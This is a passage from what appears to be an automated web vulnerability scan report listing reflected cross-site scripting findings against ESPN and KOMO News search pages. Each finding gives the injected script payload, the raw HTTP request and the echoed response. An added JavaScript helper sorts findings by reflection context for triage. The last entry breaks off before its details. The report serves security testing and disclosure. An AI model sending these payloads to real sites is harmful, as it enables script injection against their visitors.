3.319. http://search.espn.go.com/s/ie8/suggestions [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.espn.go.com
Path:   /s/ie8/suggestions

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 337fb<script>alert(1)</script>c9bcf2da6ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response: the front end's 404 page (Server: barista/3.3.6) writes the requested path into the body without encoding. The request below sends < and > literally in the request line; a browser percent-encodes them in a path, so exploitability through a crafted link depends on the server decoding %3C and %3E before it builds the error page, which should be confirmed separately.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/ie8337fb<script>alert(1)</script>c9bcf2da6ef/suggestions?q={searchTerms} HTTP/1.1
Host: search.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 139
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/s/ie8337fb<script>alert(1)</script>c9bcf2da6ef/suggestions</BODY></HTML>

3.320. http://search.espn.go.com/s/ie8/suggestions [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.espn.go.com
Path:   /s/ie8/suggestions

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5dae3<script>alert(1)</script>2ed2625dccf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/ie8/suggestions5dae3<script>alert(1)</script>2ed2625dccf?q={searchTerms} HTTP/1.1
Host: search.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 139
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/s/ie8/suggestions5dae3<script>alert(1)</script>2ed2625dccf</BODY></HTML>
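The instances on this page fall into four reflection contexts: a double-quoted JavaScript string (3.314 to 3.317), an HTML comment (3.318), text between tags (3.319 and 3.320, and 3.329 below) and a double-quoted attribute value (3.321 to 3.328 below). The following is an added example, not the scanner's code, of how that context is decided from a response body and the payload that was sent, which is the triage step a reviewer of a report like this repeats by hand. The sample bodies are abridged copies of excerpts on this page; the heuristics (last open tag, quote counting, comment and script boundaries) are a simplified stand-in for a real HTML tokenizer and are not a claim about how the scanner works. The "encoded" outcome distinguishes the 4shared status line, which shows the payload as &quot;, from the body, which does not encode it.

```javascript
// Added example, not the scanner's code. classifyReflection() decides which
// context a reflected payload landed in. The heuristics (last open tag, quote
// counting, comment and script boundaries) are a simplified stand-in for a
// real HTML tokenizer (assumption); the sample bodies are abridged copies of
// response excerpts shown on this page.

function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;' };
  return s.replace(/[&<>"]/g, (c) => map[c]);
}

// Quote state at the end of a run of source: '"', "'" or null. Backslash
// escapes only matter in JavaScript, not in HTML attributes.
function quoteState(src, backslashEscapes) {
  let q = null;
  for (let i = 0; i < src.length; i++) {
    const c = src[i];
    if (q) {
      if (backslashEscapes && c === '\\') i++;
      else if (c === q) q = null;
    } else if (c === '"' || c === "'") {
      q = c;
    }
  }
  return q;
}

function classifyReflection(body, payload) {
  const at = body.indexOf(payload);
  if (at === -1) {
    return body.indexOf(htmlEncode(payload)) !== -1 ? 'encoded' : 'not-reflected';
  }
  const before = body.slice(0, at);
  const lower = before.toLowerCase();

  // Inside <script>: the last opening tag has no closing tag after it.
  const scriptOpen = lower.lastIndexOf('<script');
  if (scriptOpen !== -1 && scriptOpen > lower.lastIndexOf('</script')) {
    const q = quoteState(before.slice(before.indexOf('>', scriptOpen) + 1), true);
    if (q === '"') return 'js-string-double-quoted';
    if (q === "'") return 'js-string-single-quoted';
    return 'js-code';
  }

  // Inside an HTML comment: the last "<!--" has no "-->" after it.
  const commentOpen = before.lastIndexOf('<!--');
  if (commentOpen !== -1 && before.indexOf('-->', commentOpen) === -1) return 'html-comment';

  // Inside a tag: the last "<" has no ">" after it.
  const tagOpen = before.lastIndexOf('<');
  if (tagOpen !== -1 && before.indexOf('>', tagOpen) === -1) {
    const q = quoteState(before.slice(tagOpen), false);
    if (q === '"') return 'attribute-double-quoted';
    if (q === "'") return 'attribute-single-quoted';
    return 'tag';
  }
  return 'text';
}

// Abridged copies of response excerpts from this page, one per context.
const SAMPLES = {
  fourSharedScript: {
    payload: 'a3880"-alert(1)-"5bdfa9fe7b5',
    body: '<script type="text/javascript">\nfunction reportAbuse() {\nvar windowname="abuse";\n' +
      'var url="/abuse.jsp?aLink=http://search.4shared.com/cssa3880"-alert(1)-"5bdfa9fe7b5/mainWithoutCommon.css";\n}\n</script>',
  },
  fourSharedStatusLine: {
    payload: 'a3880"-alert(1)-"5bdfa9fe7b5',
    body: 'HTTP/1.1 404 /cssa3880&quot;-alert(1)-&quot;5bdfa9fe7b5/mainWithoutCommon.css',
  },
  fourSharedComment: {
    payload: 'ef9a6--><script>alert(1)</script>310e4e7016',
    body: '<!-- params: {searchName=, ef9a6--><script>alert(1)</script>310e4e7016=1, start=0} -->',
  },
  espn404: {
    payload: '337fb<script>alert(1)</script>c9bcf2da6ef',
    body: '<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/s/ie8337fb<script>alert(1)</script>c9bcf2da6ef/suggestions</BODY></HTML>',
  },
  komoLink: {
    payload: '828f5"><script>alert(1)</script>39ab8bcd49a',
    body: '<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&828f5"><script>alert(1)</script>39ab8bcd49a=1&ename=rsspage" />',
  },
};

function classifyAll() {
  const out = {};
  for (const [name, s] of Object.entries(SAMPLES)) out[name] = classifyReflection(s.body, s.payload);
  return out;
}

console.log(classifyAll());
```

The context decides which payload shape proves the bug and which encoding fixes it: a JS string needs the "-alert(1)-" probe and JavaScript escaping, a comment needs --> and removal of the dump, text and attributes need < or "> and HTML entity encoding. A payload that comes back only in encoded form, as on the status line, is not an injection.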

3.321. http://search.komonews.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 828f5"><script>alert(1)</script>39ab8bcd49a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response, in the href of the RSS <link> element in the document head; the "> in the payload closes the attribute and the tag, and the injected script element is parsed in its place. Note that the SS-InternalUrl response header carries the same parameter name percent-encoded, while the href attribute is built from the raw query string.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?828f5"><script>alert(1)</script>39ab8bcd49a=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&828f5%22%3e%3cscript%3ealert(1)%3c%2fscript%3e39ab8bcd49a=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 59417
Set-Cookie: .ASPXANONYMOUS=CMDHFEAKzAEkAAAAY2U0MzNhZmYtZGUxZi00YTI5LWFlNzQtYzcyYjQzY2M2MWFiZBs8uVr2lxQ8LA9daCyY3ENgMo01; expires=Wed, 04-May-2011 09:46:02 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:02 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:02 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:02 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:02 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:02 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>KOMO News</title>
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   <m
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&828f5"><script>alert(1)</script>39ab8bcd49a=1&ename=rsspage" />
...[SNIP]...

3.322. http://search.komonews.com/Boeing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /Boeing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5871d"><script>alert(1)</script>471bc5d854b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Boeing?5871d"><script>alert(1)</script>471bc5d854b=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&type=20245,90000063&5871d%22%3e%3cscript%3ealert(1)%3c%2fscript%3e471bc5d854b=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48506
Set-Cookie: .ASPXANONYMOUS=v2zMF0AKzAEkAAAAMjBjMTQyZTUtOTMxNi00NmI4LWIwMzUtMTM3OTI0Zjc1NTE3qQuSrY5MTFyMezLzfacF0LvtraM1; expires=Wed, 04-May-2011 09:46:08 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:08 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Boeing News</title>
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&type=20245,90000063&5871d"><script>alert(1)</script>471bc5d854b=1&ename=rsspage" />
...[SNIP]...

3.323. http://search.komonews.com/Microsoft [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /Microsoft

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1976"><script>alert(1)</script>295fe6a9b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Microsoft?f1976"><script>alert(1)</script>295fe6a9b13=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&type=20245,89000029&f1976%22%3e%3cscript%3ealert(1)%3c%2fscript%3e295fe6a9b13=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44873
Set-Cookie: .ASPXANONYMOUS=K5LHF0AKzAEkAAAAMDRjNTEwMDMtNzA3YS00NTcwLWJkYmMtZjlkYmZlMjBlYWUx3Uqln6MJkSOnnnoDhvzfEXifdtQ1; expires=Wed, 04-May-2011 09:46:08 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:08 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Microsoft News</title>
   <meta http-equiv="X-UA-Compatible" content="IE=7" /
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&type=20245,89000029&f1976"><script>alert(1)</script>295fe6a9b13=1&ename=rsspage" />
...[SNIP]...

3.324. http://search.komonews.com/National-Leaders/Barack-Obama [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /National-Leaders/Barack-Obama

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afb1f"><script>alert(1)</script>56cfaf9390e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /National-Leaders/Barack-Obama?afb1f"><script>alert(1)</script>56cfaf9390e=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&type=20230,50001140&afb1f%22%3e%3cscript%3ealert(1)%3c%2fscript%3e56cfaf9390e=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53639
Set-Cookie: .ASPXANONYMOUS=96RrJkAKzAEkAAAAODVlY2RkYTgtM2Y5Mi00MmNjLThiYzEtZDY1NzQzYTk4ODg0CqP5RJJL7rmcVYFM8LPTMuEZ88A1; expires=Wed, 04-May-2011 09:46:32 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:32 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:32 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:32 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:32 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:32 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Barack Obama News</title>
   <meta http-equiv="X-UA-Compatible" content="IE=7
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&type=20230,50001140&afb1f"><script>alert(1)</script>56cfaf9390e=1&ename=rsspage" />
...[SNIP]...

3.325. http://search.komonews.com/Sports/Mariners [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /Sports/Mariners

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd653"><script>alert(1)</script>52ad56ec133 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Sports/Mariners?bd653"><script>alert(1)</script>52ad56ec133=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&q=&=quot%3bMariners%2cquot%3b&type=20198,20249732&bd653%22%3e%3cscript%3ealert(1)%3c%2fscript%3e52ad56ec133=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51176
Set-Cookie: .ASPXANONYMOUS=nCStKEAKzAEkAAAAMThmMTQwMzAtZDJjYS00NGU3LTgxMzMtMDRlY2JmY2MwYTFiA5OESjmJdTdf8b9aTWmeoyyk5RE1; expires=Wed, 04-May-2011 09:46:36 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:36 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:36 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:36 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:36 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:36 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Sports News</title>
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&=quot%3bMariners%2cquot%3b&type=20198,20249732&bd653"><script>alert(1)</script>52ad56ec133=1&ename=rsspage" />
...[SNIP]...

3.326. http://search.komonews.com/Sports/Seahawks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /Sports/Seahawks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed940"><script>alert(1)</script>af0d5982538 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Sports/Seahawks?ed940"><script>alert(1)</script>af0d5982538=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&q=&=quot%3bSeahawks%2cquot%3b&type=20198,20249732&ed940%22%3e%3cscript%3ealert(1)%3c%2fscript%3eaf0d5982538=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51176
Set-Cookie: .ASPXANONYMOUS=irwmKUAKzAEkAAAAMGVhNGU4MDctYTUzOC00M2JmLTg0OGYtMTlkMWEyM2YzNzVhP97LsOtMhGepQwGK_6QVdWu3ce81; expires=Wed, 04-May-2011 09:46:37 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:37 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:37 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:37 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:37 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:37 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Sports News</title>
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&=quot%3bSeahawks%2cquot%3b&type=20198,20249732&ed940"><script>alert(1)</script>af0d5982538=1&ename=rsspage" />
...[SNIP]...

3.327. http://search.komonews.com/Sports/Sounders [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /Sports/Sounders

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52dca"><script>alert(1)</script>187c0480744 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Sports/Sounders?52dca"><script>alert(1)</script>187c0480744=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&q=%22Sounders%22&type=20198,20249732&52dca%22%3e%3cscript%3ealert(1)%3c%2fscript%3e187c0480744=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48661
Set-Cookie: .ASPXANONYMOUS=tGPDKUAKzAEkAAAANzM0Mjg0ZWEtZTJkNS00NmE1LWIyY2QtNjJiOGEyNTc1NWUwSHq9SF8emDkTTAASAqfuVEITTFM1; expires=Wed, 04-May-2011 09:46:38 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:38 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:38 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:38 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:38 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:38 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Sports &quot;Sounders&quot; News</title>
   <meta http-equiv="X-UA-Compatible
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&q=%22Sounders%22&type=20198,20249732&52dca"><script>alert(1)</script>187c0480744=1&ename=rsspage" />
...[SNIP]...

3.328. http://search.komonews.com/default.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 262ed"><script>alert(1)</script>6ed48e1f7ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /default.aspx?ct=r&q=alaskan+way+viaduct&262ed"><script>alert(1)</script>6ed48e1f7ef=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:07:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&q=alaskan+way+viaduct&262ed%22%3e%3cscript%3ealert(1)%3c%2fscript%3e6ed48e1f7ef=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47701
Set-Cookie: .ASPXANONYMOUS=_IvWOUAKzAEkAAAAZmQyMjEzZTUtMmM2OS00MTE5LWJjZDctNDU1ZTI1ZTQ5OWUwH664_BbROqxQXMQjructrXLWTLI1; expires=Wed, 04-May-2011 09:47:05 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:07:05 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:07:05 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:07:05 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:07:05 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:07:05 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Alaskan Way Viaduct News</title>
   <meta http-equiv="X-UA-Compatible" conten
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&q=alaskan+way+viaduct&262ed"><script>alert(1)</script>6ed48e1f7ef=1&ename=rsspage" />
...[SNIP]...

3.329. http://search.komonews.com/default.aspx [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /default.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 800ef<script>alert(1)</script>802ab134ff2 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /default.aspx?ct=r&q=alaskan+way+viaduct800ef<script>alert(1)</script>802ab134ff2 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&q=alaskan+way+viaduct+800+e%3cscript%3ealert(1)%3c%2fscript%3e802ab134ff2&cq=alaskan+way+viaduct800ef%3cscript%3ealert(1)%3c%2fscript%3e802ab134ff2
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16006
Set-Cookie: .ASPXANONYMOUS=4KApLUAKzAEkAAAAZDE4MjJmMDQtMGFjNi00NDdjLWEwYzEtMzY3NGRhM2NkMGQyHZX1RYPJpm0WtbgAPpNgmu8k3vc1; expires=Wed, 04-May-2011 09:46:43 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:43 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:43 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:43 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:43 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:43 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>&quot;alaskan way viaduct 800 e&lt;script&gt;alert 1 &lt; script&gt;802ab13
...[SNIP]...
<div class="noresults">No results found for &quot;alaskan way viaduct800ef<script>alert(1)</script>802ab134ff2&quot; or &quot;alaskan way viaduct 800 e&lt;script&gt;alert(1)&lt;/script&gt;802ab134ff2&quot;.</div>
...[SNIP]...

3.330. https://server.iad.liveperson.net/hc/14598237/ [divID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://server.iad.liveperson.net
Path:   /hc/14598237/

Issue detail

